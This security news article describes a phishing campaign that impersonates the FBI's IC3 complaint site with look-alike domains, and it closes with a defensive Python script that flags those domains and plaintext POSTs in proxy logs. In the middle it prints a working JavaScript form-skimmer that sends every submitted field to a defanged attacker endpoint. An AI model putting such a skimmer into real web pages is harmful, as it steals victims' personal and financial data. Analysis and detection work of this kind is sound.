Threat Actors Impersonate FBI IC3 Website to Steal The Visitors’ Personal Information


A sophisticated spoofing campaign has emerged targeting the Federal Bureau of Investigation’s Internet Crime Complaint Center (IC3).

Beginning in mid-September 2025, victims attempting to access IC3’s official portal were redirected to fraudulent domains crafted to mirror the legitimate site.

The impersonators employed look-alike URLs—such as “ic3-gov.com” and “ic3gov.org”—and reproduced authentic branding, including the FBI seal and IC3 banner.

Visitors who entered personal data found their information harvested for identity theft and financial fraud.

IC3 analysts identified the first wave of these fraudulent sites on September 18, 2025, when multiple reports surfaced of visitors receiving deceptive emails purportedly confirming IC3 report submissions.

Those messages contained links that led to cloned pages demanding extensive personally identifiable information (PII).


Although the initial entry point resembled a routine confirmation notice, the campaign’s underlying payload quietly exfiltrated all form data to attacker-controlled servers.

Following these early alerts, IC3 researchers noted that the spoofed infrastructure was hosted via bulletproof providers, enabling rapid domain rotation and frustrating takedown efforts.

Victims who attempted to “report” crimes or update existing reports unwittingly provided names, home addresses, phone numbers, email credentials, Social Security numbers, and banking information—all transmitted in clear text over HTTP.

In some cases, the cloned pages concealed additional JavaScript modules designed to capture keystrokes and cookies, further compromising visitor security.

Infection Mechanism and Data Harvesting

The malicious sites operate purely through phishing and client-side scripting. Upon loading, a JavaScript snippet intercepts the legitimate form’s submit event, rerouting user inputs to an exfiltration endpoint before allowing the browser to proceed or display a generic error.

A representative snippet illustrates this tactic:

// Hooks the complaint form's submit event (the attacker-side script described above)
document.querySelector('form#complaintForm').addEventListener('submit', function(evt) {
  evt.preventDefault();                 // block the normal submission for now
  var formData = new FormData(this);    // copy every field the victim filled in
  fetch('https://malicious-ic3[.]net/collect', {   // exfiltration endpoint (defanged)
    method: 'POST',
    body: formData
  }).then(() => this.submit());         // then let the real submit proceed so nothing looks wrong
});

This approach enables seamless data capture without alerting the victim. The script also logs keystrokes via an injected listener on all input fields, collecting credentials and session cookies.

Because the code is embedded directly in the page’s HTML, traditional antivirus solutions relying on signature-based detection struggle to flag the threat.

Subsequent network analysis revealed repeated POST requests to the malicious domain shortly after each form submission, confirming successful data exfiltration.

Professionals are urged to verify the URL, ensure HTTPS with a valid .gov certificate, and report any suspicious IC3-branded pages to the FBI immediately.
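As an added illustration of the network-level signs noted above (not code from the article or from IC3), the following script walks a constructed proxy log and flags requests to hosts that carry the "ic3" name outside the ic3.gov domain, POSTs made without TLS, and submissions referred from such look-alike pages. The log format, the sample hostnames, and the `analyze` function are all assumptions made for this example.

```python
import re
from urllib.parse import urlsplit

LEGIT_HOST = "ic3.gov"

# Constructed sample proxy log (not real traffic): method, requested URL, referrer ("-" if none).
SAMPLE_LOG = """\
GET https://www.ic3.gov/ -
POST https://www.ic3.gov/Home/FileComplaint https://www.ic3.gov/
GET https://ic3gov.org/ -
POST https://malicious-ic3.net/collect https://ic3-gov.com/complaint
POST http://ic3-gov.com/submit https://ic3-gov.com/
GET https://example.com/ic3-news -
"""

LINE_RE = re.compile(r"^(?P<method>[A-Z]+)\s+(?P<url>\S+)\s+(?P<referrer>\S+)$")


def is_legit_ic3_host(host):
    """True only for ic3.gov itself or a subdomain of it."""
    host = host.lower()
    return host == LEGIT_HOST or host.endswith("." + LEGIT_HOST)


def is_lookalike_host(host):
    """A hostname that carries the 'ic3' token but is not under ic3.gov."""
    return "ic3" in host.lower() and not is_legit_ic3_host(host)


def analyze(log_text):
    """Return (method, host, [reasons]) for every log line that looks suspicious."""
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # skip lines that do not fit the assumed format
        method, url, referrer = m.group("method", "url", "referrer")
        parts = urlsplit(url)
        host = parts.hostname or ""
        ref_host = (urlsplit(referrer).hostname or "") if referrer != "-" else ""
        reasons = []
        if is_lookalike_host(host):
            reasons.append("request to IC3 look-alike host")
        if method == "POST":
            if parts.scheme != "https":
                reasons.append("form data sent without TLS")
            if ref_host and is_lookalike_host(ref_host):
                reasons.append("submitted from look-alike page " + ref_host)
        if reasons:
            findings.append((method, host, reasons))
    return findings
```

Running `analyze(SAMPLE_LOG)` returns three findings: the ic3gov.org visit, the POST to malicious-ic3.net referred from ic3-gov.com, and the plaintext POST to ic3-gov.com; the legitimate ic3.gov traffic and the example.com path containing "ic3" are left alone.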


About Cybernoz

Security researcher and threat analyst with expertise in malware analysis and incident response.